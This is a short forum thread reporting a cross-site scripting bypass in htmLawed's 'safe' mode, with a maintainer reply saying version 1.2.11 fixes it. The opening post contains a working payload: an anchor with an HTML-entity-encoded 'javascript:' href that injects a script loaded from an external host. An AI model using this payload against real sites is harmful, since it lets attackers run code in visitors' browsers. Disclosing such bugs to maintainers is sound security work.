1 (edited by NinCollin 2022-12-28 00:50:20)

Topic: Bug/exploit with "javascript:"

With config option "safe"  set to 1, the following snippet is not properly mitigated and presents an exploit:

<a href="javascript&colon;&lpar;function&lpar;&rpar;{document.body.appendChild&lpar;document.createElement&lpar;&#x27;script&#x27;&rpar;&rpar;.src=&#x27;https://scripts.rainynight.city/beanz.js&#x27;;}&rpar;&lpar;&rpar;;">Beans</a>

Certain special characters are replaced with HTML entities, and it's even possible to load external scripts (the script in this example is just an alert window)

2

Re: Bug/exploit with "javascript:"

Thanks for posting. Will follow up.

3

Re: Bug/exploit with "javascript:"

This important security issue is mitigated in the new version of htmLawed (1.2.11).